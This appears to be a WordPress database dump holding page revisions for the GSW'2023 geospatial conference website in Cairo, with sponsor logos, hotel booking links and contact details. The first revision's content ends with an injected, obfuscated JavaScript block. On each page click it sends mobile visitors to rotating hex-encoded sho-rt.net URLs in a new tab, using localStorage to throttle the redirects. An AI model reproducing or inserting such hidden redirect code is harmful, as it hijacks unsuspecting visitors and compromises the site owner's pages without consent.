link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 10:48:16','2023-06-14 10:48:16','',3066,'https://gsw2023.com/?p=4698',0,'revision','',0),
(4699,1,'2023-06-14 10:49:14','2023-06-14 10:49:14','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"50\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" 